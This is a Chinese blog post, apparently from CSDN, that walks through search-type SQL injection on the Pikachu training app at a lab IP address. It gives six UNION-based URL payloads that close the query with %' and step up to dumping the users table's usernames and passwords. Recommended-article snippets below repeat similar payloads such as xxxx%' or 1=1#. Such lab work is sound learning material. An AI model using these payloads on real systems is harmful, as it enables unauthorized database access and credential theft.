Pikachu SQL注入之搜索型注入

最新推荐文章于 2025-06-01 21:06:03 发布
最新推荐文章于 2025-06-01 21:06:03 发布
阅读量674 收藏 7
点赞数 7
CC 4.0 BY-SA版权
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SS_liang/article/details/135531761
本文详细展示了如何通过六个步骤进行SQL注入攻击,从简单的搜索字符到获取数据库敏感信息的过程,最终利用%和作为闭合符号。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

无论是搜索型还是字符型,都是需要找到闭合的方式也就是闭合的字符,然后进行sql注入:

这里我直接梭哈,原理都一样就没必要再详细说一遍了,前面的文章都有:

构造payload:

第一步:
http://192.168.101.16/pikachu/vul/sqli/sqli_search.php?name=1%'%23&submit=%E6%90%9C%E7%B4%A2


第二步:
http://192.168.101.16/pikachu/vul/sqli/sqli_search.php?name=1%' order by 3%23&submit=%E6%90%9C%E7%B4%A2


第三步:
http://192.168.101.16/pikachu/vul/sqli/sqli_search.php?name=1%' union select database(),2,3%23&submit=%E6%90%9C%E7%B4%A2


第四步:
http://192.168.101.16/pikachu/vul/sqli/sqli_search.php?name=1%' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23&submit=%E6%90%9C%E7%B4%A2



第五步:
http://192.168.101.16/pikachu/vul/sqli/sqli_search.php?name=1%' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'%23&submit=%E6%90%9C%E7%B4%A2


第六步:
http://192.168.101.16/pikachu/vul/sqli/sqli_search.php?name=1%' union select username,password,level from users%23&submit=%E6%90%9C%E7%B4%A2

最后结果就是:

这题闭合符号是%'

拿下!

zTale
关注
pikachu搜索型注入
weixin_43622525的博客
03-07 7138
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索型注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
Pikachu搜索型注入
xdjxi的博客
03-07 919
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
Pikachu靶场-搜索型注入
最新发布
2401_83964264的博客
06-01 732
在 SELECT * FROM table WHERE name = '%ko''' 中出现三个单引号是因为:原本的SQL语句中字符串 name 的值是用单引号闭合的,即 '%username%' 的形式。当输入 ko' 时,它被拼接到了SQL语句中,就变成了 '%ko''%' ,这里第一个单引号是原SQL语句中用于开始字符串的,第二个单引号是输入的 ko' 中的单引号,第三个单引号是原SQL语句中用于结束字符串的。此时数据库会因单引号未闭合报错,回显中可能出现 '% (或转义后的符号)。
pikachu闯关(三)---搜索型注入
weixin_75034911的博客
07-13 1424
根据提示信息,可以先随便输入一个,比如:o,得到如下结果:可以猜测出大概sql语句大概是:select username,uid,email from 表名 where username like '%o%',那么我们要进行注入就要形成闭环可以改为%’形成闭环,相当于成了:select username,uid,email from 表名 where username like '%o%' and 1=1 # %‘,其中 o%' and 1=1 # 这个为我们输入的内容。还是按照之前的步骤进行注入
搜索框注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4290
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场之SQL注入
2201_75766364的博客
03-28 1373
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
SQL注入之字符型注入练习(pikachu
windStudyer的专栏
04-17 3945
SQL注入之字符型 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符型注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类型 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类型 从上可以看出,请求的方法为get类型,注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符型。 判断注入点 从2.1知道请求方法和注入类型,因为是字符..
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu搜索型注入
2301_79595769的博客
12-23 325
判断搜索型注入的方法:1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况5 根据两次的返回情况来判断是不是搜索型文本框注入了。
pikachu搜索型注入
weixin_50339082的博客
06-14 841
pikachu搜索型注入 一、原理 $sql="select * from user where password like '%$pwd%' order by password" “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面
pikachu SQL注入搜索型
ANYOUZHEN的博客
05-09 284
观察后端代码,尝试构造合法闭合 payload:xxxx%' or 1=1# 成功注入,#在MySQL数据库中起到注释的作用,可以去掉后面的代码
SQL注入——搜索型注入
YJ_12340的博客
08-01 1791
一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在;其中又分为 POST/GET ,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的 method="get" 属性来区分是get还是post。搜索型注入又称为文本框注入
pikachu之特殊注入搜索型注入、xx型注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1633
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
手动漏洞挖掘 Pikachu搜索型注入
胡乱写点什么
06-23 247
手动漏洞挖掘(三) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— Pikachu搜索型注入 —— 需要的工具: pikachu 一.过程 搜索 因为会自动匹配到username,所以可以联想到这段语句使用了mysql的模糊查询。sql语句可能为:Where username like ’%a%‘。我们先尝试闭合,然后再注释,看是否能正常返回。 可以正常返回,然后判断列数 a%’ order by 4 # --报错 a%’ order by 3 #
pikachu靶场的搜索型注入
ranioe的博客
12-08 4037
搜索型注入 搜索vince 测试该传参点是否可以注入 搜索vince’看看能不能注入 说明这个传参点可注入,并且返回了部分代码’%” 说明源代码不是使用”闭合的。猜测源代码的闭合方式’%username%’ 猜测源代码的闭合方式’%username%’ 使用语句:正确返回的内容 %’ 注入sql语句 # and 1=1 返回正常,and 1=2报错,说明可以开始注入 尝试mysql联合查询注入 先判断字段数 当字段为4时报错,说明字段数为3。确定字段数为3 查询可回显位 说明字段1,2,3
pikachu sql注入数字型
09-13
针对pikachu数据库SQL注入,可以使用以下方法来实现数字型注入: 1. 首先,我们需要了解当前数据库中的表信息。可以通过使用UNION联合查询结合information_schema数据库来获取表名。具体的SQL语句如下: ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zTale

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值